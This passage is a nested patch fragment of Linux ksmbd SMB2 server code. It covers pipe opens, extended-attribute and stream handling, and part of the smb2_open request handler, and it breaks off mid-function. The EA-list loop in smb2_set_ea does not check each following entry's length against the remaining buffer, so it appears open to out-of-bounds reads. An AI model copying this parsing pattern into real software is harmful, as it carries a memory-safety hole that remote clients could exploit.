+-	struct smb2_create_req *req = smb2_get_msg(work->request_buf);
+-	int id;
+-	int err;
+-	char *name;
+-
+-	name = smb_strndup_from_utf16(req->Buffer, le16_to_cpu(req->NameLength),
+-				      1, work->conn->local_nls);
+-	if (IS_ERR(name)) {
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		err = PTR_ERR(name);
+-		goto out;
+-	}
+-
+-	id = ksmbd_session_rpc_open(work->sess, name);
+-	if (id < 0) {
+-		pr_err("Unable to open RPC pipe: %d\n", id);
+-		err = id;
+-		goto out;
+-	}
+-
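+-	/* Pipe opens always report FILE_OPENED with zeroed times and sizes. */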
+-	rsp->hdr.Status = STATUS_SUCCESS;
+-	rsp->StructureSize = cpu_to_le16(89);
+-	rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
+-	rsp->Flags = 0;
+-	rsp->CreateAction = cpu_to_le32(FILE_OPENED);
+-
+-	rsp->CreationTime = cpu_to_le64(0);
+-	rsp->LastAccessTime = cpu_to_le64(0);
+-	rsp->ChangeTime = cpu_to_le64(0);
+-	rsp->AllocationSize = cpu_to_le64(0);
+-	rsp->EndofFile = cpu_to_le64(0);
+-	rsp->FileAttributes = FILE_ATTRIBUTE_NORMAL_LE;
+-	rsp->Reserved2 = 0;
+-	rsp->VolatileFileId = id;
+-	rsp->PersistentFileId = 0;
+-	rsp->CreateContextsOffset = 0;
+-	rsp->CreateContextsLength = 0;
+-
+-	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1 */
+-	kfree(name);
+-	return 0;
+-
+-out:
+-	switch (err) {
+-	case -EINVAL:
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		break;
+-	case -ENOSPC:
+-	case -ENOMEM:
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		break;
+-	}
+-
+-	if (!IS_ERR(name))
+-		kfree(name);
+-
+-	smb2_set_err_rsp(work);
+-	return err;
+-}
+-
+-/**
+- * smb2_set_ea() - handler for setting extended attributes using set
+- *		info command
+- * @eabuf:	set info command buffer
+- * @buf_len:	set info command buffer length
+- * @path:	path of the dentry to set the EA on
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_set_ea(struct smb2_ea_info *eabuf, unsigned int buf_len,
+-		       const struct path *path)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	char *attr_name = NULL, *value;
+-	int rc = 0;
+-	unsigned int next = 0;
+-
+-	if (buf_len < sizeof(struct smb2_ea_info) + eabuf->EaNameLength +
+-			le16_to_cpu(eabuf->EaValueLength))
+-		return -EINVAL;
+-
+-	attr_name = kmalloc(XATTR_NAME_MAX + 1, GFP_KERNEL);
+-	if (!attr_name)
+-		return -ENOMEM;
+-
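+-	/*
+-	 * Walk the EA list via NextEntryOffset: a zero EaValueLength
+-	 * deletes the user.* xattr (if present), a non-zero value sets it.
+-	 */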
+-	do {
+-		if (!eabuf->EaNameLength)
+-			goto next;
+-
+-		ksmbd_debug(SMB,
+-			    "name : <%s>, name_len : %u, value_len : %u, next : %u\n",
+-			    eabuf->name, eabuf->EaNameLength,
+-			    le16_to_cpu(eabuf->EaValueLength),
+-			    le32_to_cpu(eabuf->NextEntryOffset));
+-
+-		if (eabuf->EaNameLength >
+-		    (XATTR_NAME_MAX - XATTR_USER_PREFIX_LEN)) {
+-			rc = -EINVAL;
+-			break;
+-		}
+-
+-		memcpy(attr_name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN);
+-		memcpy(&attr_name[XATTR_USER_PREFIX_LEN], eabuf->name,
+-		       eabuf->EaNameLength);
+-		attr_name[XATTR_USER_PREFIX_LEN + eabuf->EaNameLength] = '\0';
+-		value = (char *)&eabuf->name + eabuf->EaNameLength + 1;
+-
+-		if (!eabuf->EaValueLength) {
+-			rc = ksmbd_vfs_casexattr_len(user_ns,
+-						     path->dentry,
+-						     attr_name,
+-						     XATTR_USER_PREFIX_LEN +
+-						     eabuf->EaNameLength);
+-
+-			/* delete the EA only when it exists */
+-			if (rc > 0) {
+-				rc = ksmbd_vfs_remove_xattr(user_ns,
+-							    path->dentry,
+-							    attr_name);
+-
+-				if (rc < 0) {
+-					ksmbd_debug(SMB,
+-						    "remove xattr failed(%d)\n",
+-						    rc);
+-					break;
+-				}
+-			}
+-
+-			/* if the EA doesn't exist, just do nothing. */
+-			rc = 0;
+-		} else {
+-			rc = ksmbd_vfs_setxattr(user_ns,
+-						path->dentry, attr_name, value,
+-						le16_to_cpu(eabuf->EaValueLength), 0);
+-			if (rc < 0) {
+-				ksmbd_debug(SMB,
+-					    "ksmbd_vfs_setxattr is failed(%d)\n",
+-					    rc);
+-				break;
+-			}
+-		}
+-
+-next:
+-		next = le32_to_cpu(eabuf->NextEntryOffset);
+-		if (next == 0 || buf_len < next)
+-			break;
+-		buf_len -= next;
+-		eabuf = (struct smb2_ea_info *)((char *)eabuf + next);
+-		if (next < (u32)eabuf->EaNameLength + le16_to_cpu(eabuf->EaValueLength))
+-			break;
+-
+-	} while (next != 0);
+-
+-	kfree(attr_name);
+-	return rc;
+-}
+-
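+-/*
+- * Alternate data streams are stored as user xattrs: translate the
+- * stream name into an xattr name, and create the xattr on first open
+- * when the create disposition allows it.
+- */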
+-static noinline int smb2_set_stream_name_xattr(const struct path *path,
+-					       struct ksmbd_file *fp,
+-					       char *stream_name, int s_type)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	size_t xattr_stream_size;
+-	char *xattr_stream_name;
+-	int rc;
+-
+-	rc = ksmbd_vfs_xattr_stream_name(stream_name,
+-					 &xattr_stream_name,
+-					 &xattr_stream_size,
+-					 s_type);
+-	if (rc)
+-		return rc;
+-
+-	fp->stream.name = xattr_stream_name;
+-	fp->stream.size = xattr_stream_size;
+-
+-	/* Check if the stream prefix already exists in the xattr space */
+-	rc = ksmbd_vfs_casexattr_len(user_ns,
+-				     path->dentry,
+-				     xattr_stream_name,
+-				     xattr_stream_size);
+-	if (rc >= 0)
+-		return 0;
+-
+-	if (fp->cdoption == FILE_OPEN_LE) {
+-		ksmbd_debug(SMB, "XATTR stream name lookup failed: %d\n", rc);
+-		return -EBADF;
+-	}
+-
+-	rc = ksmbd_vfs_setxattr(user_ns, path->dentry,
+-				xattr_stream_name, NULL, 0, 0);
+-	if (rc < 0)
+-		pr_err("Failed to store XATTR stream name :%d\n", rc);
+-	return 0;
+-}
+-
+-static int smb2_remove_smb_xattrs(const struct path *path)
+-{
+-	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
+-	char *name, *xattr_list = NULL;
+-	ssize_t xattr_list_len;
+-	int err = 0;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+-
+-		if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN) &&
+-		    !strncmp(&name[XATTR_USER_PREFIX_LEN], STREAM_PREFIX,
+-			     STREAM_PREFIX_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, path->dentry,
+-						     name);
+-			if (err)
+-				ksmbd_debug(SMB, "remove xattr failed : %s\n",
+-					    name);
+-		}
+-	}
+-out:
+-	kvfree(xattr_list);
+-	return err;
+-}
+-
+-static int smb2_create_truncate(const struct path *path)
+-{
+-	int rc = vfs_truncate(path, 0);
+-
+-	if (rc) {
+-		pr_err("vfs_truncate failed, rc %d\n", rc);
+-		return rc;
+-	}
+-
+-	rc = smb2_remove_smb_xattrs(path);
+-	if (rc == -EOPNOTSUPP)
+-		rc = 0;
+-	if (rc)
+-		ksmbd_debug(SMB,
+-			    "ksmbd_truncate_stream_name_xattr failed, rc %d\n",
+-			    rc);
+-	return rc;
+-}
+-
+-static void smb2_new_xattrs(struct ksmbd_tree_connect *tcon, const struct path *path,
+-			    struct ksmbd_file *fp)
+-{
+-	struct xattr_dos_attrib da = {0};
+-	int rc;
+-
+-	if (!test_share_config_flag(tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
+-		return;
+-
+-	da.version = 4;
+-	da.attr = le32_to_cpu(fp->f_ci->m_fattr);
+-	da.itime = da.create_time = fp->create_time;
+-	da.flags = XATTR_DOSINFO_ATTRIB | XATTR_DOSINFO_CREATE_TIME |
+-		XATTR_DOSINFO_ITIME;
+-
+-	rc = ksmbd_vfs_set_dos_attrib_xattr(mnt_user_ns(path->mnt),
+-					    path->dentry, &da);
+-	if (rc)
+-		ksmbd_debug(SMB, "failed to store file attribute into xattr\n");
+-}
+-
+-static void smb2_update_xattrs(struct ksmbd_tree_connect *tcon,
+-			       const struct path *path, struct ksmbd_file *fp)
+-{
+-	struct xattr_dos_attrib da;
+-	int rc;
+-
+-	fp->f_ci->m_fattr &= ~(FILE_ATTRIBUTE_HIDDEN_LE | FILE_ATTRIBUTE_SYSTEM_LE);
+-
+-	/* get FileAttributes from XATTR_NAME_DOS_ATTRIBUTE */
+-	if (!test_share_config_flag(tcon->share_conf,
+-				    KSMBD_SHARE_FLAG_STORE_DOS_ATTRS))
+-		return;
+-
+-	rc = ksmbd_vfs_get_dos_attrib_xattr(mnt_user_ns(path->mnt),
+-					    path->dentry, &da);
+-	if (rc > 0) {
+-		fp->f_ci->m_fattr = cpu_to_le32(da.attr);
+-		fp->create_time = da.create_time;
+-		fp->itime = da.itime;
+-	}
+-}
+-
+-static int smb2_creat(struct ksmbd_work *work, struct path *path, char *name,
+-		      int open_flags, umode_t posix_mode, bool is_dir)
+-{
+-	struct ksmbd_tree_connect *tcon = work->tcon;
+-	struct ksmbd_share_config *share = tcon->share_conf;
+-	umode_t mode;
+-	int rc;
+-
+-	if (!(open_flags & O_CREAT))
+-		return -EBADF;
+-
+-	ksmbd_debug(SMB, "file does not exist, so creating\n");
+-	if (is_dir == true) {
+-		ksmbd_debug(SMB, "creating directory\n");
+-
+-		mode = share_config_directory_mode(share, posix_mode);
+-		rc = ksmbd_vfs_mkdir(work, name, mode);
+-		if (rc)
+-			return rc;
+-	} else {
+-		ksmbd_debug(SMB, "creating regular file\n");
+-
+-		mode = share_config_create_mode(share, posix_mode);
+-		rc = ksmbd_vfs_create(work, name, mode);
+-		if (rc)
+-			return rc;
+-	}
+-
+-	rc = ksmbd_vfs_kern_path(work, name, 0, path, 0);
+-	if (rc) {
+-		pr_err("cannot get linux path (%s), err = %d\n",
+-		       name, rc);
+-		return rc;
+-	}
+-	return 0;
+-}
+-
+-static int smb2_create_sd_buffer(struct ksmbd_work *work,
+-				 struct smb2_create_req *req,
+-				 const struct path *path)
+-{
+-	struct create_context *context;
+-	struct create_sd_buf_req *sd_buf;
+-
+-	if (!req->CreateContextsOffset)
+-		return -ENOENT;
+-
+-	/* Parse SD BUFFER create contexts */
+-	context = smb2_find_context_vals(req, SMB2_CREATE_SD_BUFFER, 4);
+-	if (!context)
+-		return -ENOENT;
+-	else if (IS_ERR(context))
+-		return PTR_ERR(context);
+-
+-	ksmbd_debug(SMB,
+-		    "Set ACLs using SMB2_CREATE_SD_BUFFER context\n");
+-	sd_buf = (struct create_sd_buf_req *)context;
+-	if (le16_to_cpu(context->DataOffset) +
+-	    le32_to_cpu(context->DataLength) <
+-	    sizeof(struct create_sd_buf_req))
+-		return -EINVAL;
+-	return set_info_sec(work->conn, work->tcon, path, &sd_buf->ntsd,
+-			    le32_to_cpu(sd_buf->ccontext.DataLength), true);
+-}
+-
+-static void ksmbd_acls_fattr(struct smb_fattr *fattr,
+-			     struct user_namespace *mnt_userns,
+-			     struct inode *inode)
+-{
+-	vfsuid_t vfsuid = i_uid_into_vfsuid(mnt_userns, inode);
+-	vfsgid_t vfsgid = i_gid_into_vfsgid(mnt_userns, inode);
+-
+-	fattr->cf_uid = vfsuid_into_kuid(vfsuid);
+-	fattr->cf_gid = vfsgid_into_kgid(vfsgid);
+-	fattr->cf_mode = inode->i_mode;
+-	fattr->cf_acls = NULL;
+-	fattr->cf_dacls = NULL;
+-
+-	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-		fattr->cf_acls = get_acl(inode, ACL_TYPE_ACCESS);
+-		if (S_ISDIR(inode->i_mode))
+-			fattr->cf_dacls = get_acl(inode, ACL_TYPE_DEFAULT);
+-	}
+-}
+-
+-/**
+- * smb2_open() - handler for smb file open request
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb2_open(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_tree_connect *tcon = work->tcon;
+-	struct smb2_create_req *req;
+-	struct smb2_create_rsp *rsp;
+-	struct path path;
+-	struct ksmbd_share_config *share = tcon->share_conf;
+-	struct ksmbd_file *fp = NULL;
+-	struct file *filp = NULL;
+-	struct user_namespace *user_ns = NULL;
+-	struct kstat stat;
+-	struct create_context *context;
+-	struct lease_ctx_info *lc = NULL;
+-	struct create_ea_buf_req *ea_buf = NULL;
+-	struct oplock_info *opinfo;
+-	__le32 *next_ptr = NULL;
+-	int req_op_level = 0, open_flags = 0, may_flags = 0, file_info = 0;
+-	int rc = 0;
+-	int contxt_cnt = 0, query_disk_id = 0;
+-	int maximal_access_ctxt = 0, posix_ctxt = 0;
+-	int s_type = 0;
+-	int next_off = 0;
+-	char *name = NULL;
+-	char *stream_name = NULL;
+-	bool file_present = false, created = false, already_permitted = false;
+-	int share_ret, need_truncate = 0;
+-	u64 time;
+-	umode_t posix_mode = 0;
+-	__le32 daccess, maximal_access = 0;
+-
+-	WORK_BUFFERS(work, req, rsp);
+-
+-	if (req->hdr.NextCommand && !work->next_smb2_rcv_hdr_off &&
+-	    (req->hdr.Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
+-		ksmbd_debug(SMB, "invalid flag in chained command\n");
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		smb2_set_err_rsp(work);
+-		return -EINVAL;
+-	}
+-
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC pipe create request\n");
+-		return create_smb2_pipe(work);
+-	}
+-
+-	if (req->NameLength) {
+-		if ((req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
+-		    *(char *)req->Buffer == '\\') {
+-			pr_err("not allow directory name included leading slash\n");
+-			rc = -EINVAL;
+-			goto err_out1;
+-		}
+-
+-		name = smb2_get_name(req->Buffer,
+-				     le16_to_cpu(req->NameLength),
+-				     work->conn->local_nls);
+-		if (IS_ERR(name)) {
+-			rc = PTR_ERR(name);
+-			if (rc != -ENOMEM)
+-				rc = -ENOENT;
+-			name = NULL;
+-			goto err_out1;
+-		}
+-
+-		ksmbd_debug(SMB, "converted name = %s\n", name);
+-		if (strchr(name, ':')) {
+-			if (!test_share_config_flag(work->tcon->share_conf,
+-						    KSMBD_SHARE_FLAG_STREAMS)) {
+-				rc = -EBADF;
+-				goto err_out1;
+-			}
+-			rc = parse_stream_name(name, &stream_name, &s_type);
+-			if (rc < 0)
+-				goto err_out1;
+-		}
+-
+-		rc = ksmbd_validate_filename(name);
+-		if (rc < 0)
+-			goto err_out1;
+-
+-		if (ksmbd_share_veto_filename(share, name)) {
+-			rc = -ENOENT;
+-			ksmbd_debug(SMB, "Reject open(), vetoed file: %s\n",
+-				    name);
+-			goto err_out1;
+-		}
+-	} else {
+-		name = kstrdup("", GFP_KERNEL);
+-		if (!name) {
+-			rc = -ENOMEM;
+-			goto err_out1;
+-		}
+-	}
+-
+-	req_op_level = req->RequestedOplockLevel;
+-	if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE)
+-		lc = parse_lease_state(req);
+-
+-	if (le32_to_cpu(req->ImpersonationLevel) > le32_to_cpu(IL_DELEGATE)) {
+-		pr_err("Invalid impersonationlevel : 0x%x\n",
+-		       le32_to_cpu(req->ImpersonationLevel));
+-		rc = -EIO;
+-		rsp->hdr.Status = STATUS_BAD_IMPERSONATION_LEVEL;
+-		goto err_out1;
+-	}
+-
+-	if (req->CreateOptions && !(req->CreateOptions & CREATE_OPTIONS_MASK_LE)) {
+-		pr_err("Invalid create options : 0x%x\n",
+-		       le32_to_cpu(req->CreateOptions));
+-		rc = -EINVAL;
+-		goto err_out1;
+-	} else {
+-		if (req->CreateOptions & FILE_SEQUENTIAL_ONLY_LE &&
+-		    req->CreateOptions & FILE_RANDOM_ACCESS_LE)
+-			req->CreateOptions = ~(FILE_SEQUENTIAL_ONLY_LE);
+-
+-		if (req->CreateOptions &
+-		    (FILE_OPEN_BY_FILE_ID_LE | CREATE_TREE_CONNECTION |
+-		     FILE_RESERVE_OPFILTER_LE)) {
+-			rc = -EOPNOTSUPP;
+-			goto err_out1;
+-		}
+-
+-		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+-			if (req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE) {
+-				rc = -EINVAL;
+-				goto err_out1;
+-			} else if (req->CreateOptions & FILE_NO_COMPRESSION_LE) {
+-				req->CreateOptions = ~(FILE_NO_COMPRESSION_LE);
+-			}
+-		}
+-	}
+-
+-	if (le32_to_cpu(req->CreateDisposition) >
+-	    le32_to_cpu(FILE_OVERWRITE_IF_LE)) {
+-		pr_err("Invalid create disposition : 0x%x\n",
+-		       le32_to_cpu(req->CreateDisposition));
+-		rc = -EINVAL;
+-		goto err_out1;
+-	}
+-
+-	if (!(req->DesiredAccess & DESIRED_ACCESS_MASK)) {
+-		pr_err("Invalid desired access : 0x%x\n",
+-		       le32_to_cpu(req->DesiredAccess));
+-		rc = -EACCES;
+-		goto err_out1;
+-	}
+-
+-	if (req->FileAttributes && !(req->FileAttributes & FILE_ATTRIBUTE_MASK_LE)) {
+-		pr_err("Invalid file attribute : 0x%x\n",
+-		       le32_to_cpu(req->FileAttributes));
+-		rc = -EINVAL;
+-		goto err_out1;
+-	}
+-
+-	if (req->CreateContextsOffset) {
+-		/* Parse the EA buffer create context */
+-		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out1;
+-		} else if (context) {
+-			ea_buf = (struct create_ea_buf_req *)context;
+-			if (le16_to_cpu(context->DataOffset) +
+-			    le32_to_cpu(context->DataLength) <
+-			    sizeof(struct create_ea_buf_req)) {
+-				rc = -EINVAL;
+-				goto err_out1;
+-			}
+-			if (req->CreateOptions & FILE_NO_EA_KNOWLEDGE_LE) {
+-				rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-				rc = -EACCES;
+-				goto err_out1;
+-			}
+-		}
+-
+-		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out1;
+-		} else if (context) {
+-			ksmbd_debug(SMB,
+-				    "get query maximal access context\n");
+-			maximal_access_ctxt = 1;
+-		}
+-
+-		context = smb2_find_context_vals(req,
+-						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
+-		if (IS_ERR(context)) {
+-			rc = PTR_ERR(context);
+-			goto err_out1;
+-		} else if (context) {
+-			ksmbd_debug(SMB, "get timewarp context\n");
+-			rc = -EBADF;
+-			goto err_out1;
+-		}
+-
+-		if (tcon->posix_extensions) {
+-			context = smb2_find_context_vals(req,
+-							 SMB2_CREATE_TAG_POSIX, 16);
+-			if (IS_ERR(context)) {
+-				rc = PTR_ERR(context);
+-				goto err_out1;
+-			} else if (context) {
+-				struct create_posix *posix =
+-					(struct create_posix *)context;
+-				if (le16_to_cpu(context->DataOffset) +
+-				    le32_to_cpu(context->DataLength) <
+-				    sizeof(struct create_posix) - 4) {
+-					rc = -EINVAL;
+-					goto err_out1;
+-				}
+-				ksmbd_debug(SMB, "get posix context\n");
+-
+-				posix_mode = le32_to_cpu(posix->Mode);
+-				posix_ctxt = 1;
+-			}
+-		}
+-	}
+-
+-	if (ksmbd_override_fsids(work)) {
+-		rc = -ENOMEM;
+-		goto err_out1;
+-	}
+-
+-	rc = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, 1);
+-	if (!rc) {
+-		if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE) {
+-			/*
+-			 * If the file already exists with these dispositions,
+-			 * return an access-denied error.
+-			 */
+-			if (req->CreateDisposition == FILE_OVERWRITE_IF_LE ||
+-			    req->CreateDisposition == FILE_OPEN_IF_LE) {
+-				rc = -EACCES;
+-				path_put(&path);
+-				goto err_out;
+-			}
+-
+-			if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-				ksmbd_debug(SMB,
+-					    "User does not have write permission\n");
+-				rc = -EACCES;
+-				path_put(&path);
+-				goto err_out;
+-			}
+-		} else if (d_is_symlink(path.dentry)) {
+-			rc = -EACCES;
+-			path_put(&path);
+-			goto err_out;
+-		}
+-	}
+-
+-	if (rc) {
+-		if (rc != -ENOENT)
+-			goto err_out;
+-		ksmbd_debug(SMB, "can not get linux path for %s, rc = %d\n",
+-			    name, rc);
+-		rc = 0;
+-	} else {
+-		file_present = true;
+-		user_ns = mnt_user_ns(path.mnt);
+-	}
+-	if (stream_name) {
+-		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
+-			if (s_type == DATA_STREAM) {
+-				rc = -EIO;
+-				rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
+-			}
+-		} else {
+-			if (file_present && S_ISDIR(d_inode(path.dentry)->i_mode) &&
+-			    s_type == DATA_STREAM) {
+-				rc = -EIO;
+-				rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
+-			}
+-		}
+-
+-		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE &&
+-		    req->FileAttributes & FILE_ATTRIBUTE_NORMAL_LE) {
+-			rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
+-			rc = -EIO;
+-		}
+-
+-		if (rc < 0)
+-			goto err_out;
+-	}
+-
+-	if (file_present && req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE &&
+-	    S_ISDIR(d_inode(path.dentry)->i_mode) &&
+-	    !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-		ksmbd_debug(SMB, "open() argument is a directory: %s, %x\n",
+-			    name, req->CreateOptions);
+-		rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
+-		rc = -EIO;
+-		goto err_out;
+-	}
+-
+-	if (file_present && (req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
+-	    !(req->CreateDisposition == FILE_CREATE_LE) &&
+-	    !S_ISDIR(d_inode(path.dentry)->i_mode)) {
+-		rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
+-		rc = -EIO;
+-		goto err_out;
+-	}
+-
+-	if (!stream_name && file_present &&
+-	    req->CreateDisposition == FILE_CREATE_LE) {
+-		rc = -EEXIST;
+-		goto err_out;
+-	}
+-
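+-	/*
+-	 * Expand GENERIC_* bits in DesiredAccess into specific FILE_*
+-	 * rights, then, for existing files, verify them against the
+-	 * file's DACL.
+-	 */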
+-	daccess = smb_map_generic_desired_access(req->DesiredAccess);
+-
+-	if (file_present && !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-		rc = smb_check_perm_dacl(conn, &path, &daccess,
+-					 sess->user->uid);
+-		if (rc)
+-			goto err_out;
+-	}
+-
+-	if (daccess & FILE_MAXIMAL_ACCESS_LE) {
+-		if (!file_present) {
+-			daccess = cpu_to_le32(GENERIC_ALL_FLAGS);
+-		} else {
+-			rc = ksmbd_vfs_query_maximal_access(user_ns,
+-							    path.dentry,
+-							    &daccess);
+-			if (rc)
+-				goto err_out;
+-			already_permitted = true;
+-		}
+-		maximal_access = daccess;
+-	}
+-
+-	open_flags = smb2_create_open_flags(file_present, daccess,
+-					    req->CreateDisposition,
+-					    &may_flags);
+-
+-	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-		if (open_flags & O_CREAT) {
+-			ksmbd_debug(SMB,
+-				    "User does not have write permission\n");
+-			rc = -EACCES;
+-			goto err_out;
+-		}
+-	}
+-
+-	/* create file if not present */
+-	if (!file_present) {
+-		rc = smb2_creat(work, &path, name, open_flags, posix_mode,
+-				req->CreateOptions & FILE_DIRECTORY_FILE_LE);
+-		if (rc) {
+-			if (rc == -ENOENT) {
+-				rc = -EIO;
+-				rsp->hdr.Status = STATUS_OBJECT_PATH_NOT_FOUND;
+-			}
+-			goto err_out;
+-		}
+-
+-		created = true;
+-		user_ns = mnt_user_ns(path.mnt);
+-		if (ea_buf) {
+-			if (le32_to_cpu(ea_buf->ccontext.DataLength) <
+-			    sizeof(struct smb2_ea_info)) {
+-				rc = -EINVAL;
+-				goto err_out;
+-			}
+-
+-			rc = smb2_set_ea(&ea_buf->ea,
+-					 le32_to_cpu(ea_buf->ccontext.DataLength),
+-					 &path);
+-			if (rc == -EOPNOTSUPP)
+-				rc = 0;
+-			else if (rc)
+-				goto err_out;
+-		}
+-	} else if (!already_permitted) {
+-		/* FILE_READ_ATTRIBUTE is allowed without inode_permission,
+-		 * because execute (search) permission on the parent
+-		 * directory is already granted.
+-		 */
+-		if (daccess & ~(FILE_READ_ATTRIBUTES_LE | FILE_READ_CONTROL_LE)) {
+-			rc = inode_permission(user_ns,
+-					      d_inode(path.dentry),
+-					      may_flags);
+-			if (rc)
+-				goto err_out;
+-
+-			if ((daccess & FILE_DELETE_LE) ||
+-			    (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
+-				rc = ksmbd_vfs_may_delete(user_ns,
+-							  path.dentry);
+-				if (rc)
+-					goto err_out;
+-			}
+-		}
+-	}
+-
+-	rc = ksmbd_query_inode_status(d_inode(path.dentry->d_parent));
+-	if (rc == KSMBD_INODE_STATUS_PENDING_DELETE) {
+-		rc = -EBUSY;
+-		goto err_out;
+-	}
+-
+-	rc = 0;
+-	filp = dentry_open(&path, open_flags, current_cred());
+-	if (IS_ERR(filp)) {
+-		rc = PTR_ERR(filp);
+-		pr_err("dentry open for dir failed, rc %d\n", rc);
+-		goto err_out;
+-	}
+-
+-	if (file_present) {
+-		if (!(open_flags & O_TRUNC))
+-			file_info = FILE_OPENED;
+-		else
+-			file_info = FILE_OVERWRITTEN;
+-
+-		if ((req->CreateDisposition & FILE_CREATE_MASK_LE) ==
+-		    FILE_SUPERSEDE_LE)
+-			file_info = FILE_SUPERSEDED;
+-	} else if (open_flags & O_CREAT) {
+-		file_info = FILE_CREATED;
+-	}
+-
+-	ksmbd_vfs_set_fadvise(filp, req->CreateOptions);
+-
+-	/* Obtain Volatile-ID */
+-	fp = ksmbd_open_fd(work, filp);
+-	if (IS_ERR(fp)) {
+-		fput(filp);
+-		rc = PTR_ERR(fp);
+-		fp = NULL;
+-		goto err_out;
+-	}
+-
+-	/* Get Persistent-ID */
+-	ksmbd_open_durable_fd(fp);
+-	if (!has_file_id(fp->persistent_id)) {
+-		rc = -ENOMEM;
+-		goto err_out;
+-	}
+-
+-	fp->cdoption = req->CreateDisposition;
+-	fp->daccess = daccess;
+-	fp->saccess = req->ShareAccess;
+-	fp->coption = req->CreateOptions;
+-
+-	/* Set default windows and posix acls if creating new file */
+-	if (created) {
+-		int posix_acl_rc;
+-		struct inode *inode = d_inode(path.dentry);
+-
+-		posix_acl_rc = ksmbd_vfs_inherit_posix_acl(user_ns,
+-							   inode,
+-							   d_inode(path.dentry->d_parent));
+-		if (posix_acl_rc)
+-			ksmbd_debug(SMB, "inherit posix acl failed : %d\n", posix_acl_rc);
+-
+-		if (test_share_config_flag(work->tcon->share_conf,
+-					   KSMBD_SHARE_FLAG_ACL_XATTR)) {
+-			rc = smb_inherit_dacl(conn, &path, sess->user->uid,
+-					      sess->user->gid);
+-		}
+-
+-		if (rc) {
+-			rc = smb2_create_sd_buffer(work, req, &path);
+-			if (rc) {
+-				if (posix_acl_rc)
+-					ksmbd_vfs_set_init_posix_acl(user_ns,
+-								     inode);
+-
+-				if (test_share_config_flag(work->tcon->share_conf,
+-							   KSMBD_SHARE_FLAG_ACL_XATTR)) {
+-					struct smb_fattr fattr;
+-					struct smb_ntsd *pntsd;
+-					int pntsd_size, ace_num = 0;
+-
+-					ksmbd_acls_fattr(&fattr, user_ns, inode);
+-					if (fattr.cf_acls)
+-						ace_num = fattr.cf_acls->a_count;
+-					if (fattr.cf_dacls)
+-						ace_num += fattr.cf_dacls->a_count;
+-
+-					pntsd = kmalloc(sizeof(struct smb_ntsd) +
+-							sizeof(struct smb_sid) * 3 +
+-							sizeof(struct smb_acl) +
+-							sizeof(struct smb_ace) * ace_num * 2,
+-							GFP_KERNEL);
+-					if (!pntsd) {
+-						posix_acl_release(fattr.cf_acls);
+-						posix_acl_release(fattr.cf_dacls);
+-						goto err_out;
+-					}
+-
+-					rc = build_sec_desc(user_ns,
+-							    pntsd, NULL, 0,
+-							    OWNER_SECINFO |
+-							    GROUP_SECINFO |
+-							    DACL_SECINFO,
+-							    &pntsd_size, &fattr);
+-					posix_acl_release(fattr.cf_acls);
+-					posix_acl_release(fattr.cf_dacls);
+-					if (rc) {
+-						kfree(pntsd);
+-						goto err_out;
+-					}
+-
+-					rc = ksmbd_vfs_set_sd_xattr(conn,
+-								    user_ns,
+-								    path.dentry,
+-								    pntsd,
+-								    pntsd_size);
+-					kfree(pntsd);
+-					if (rc)
+-						pr_err("failed to store ntacl in xattr : %d\n",
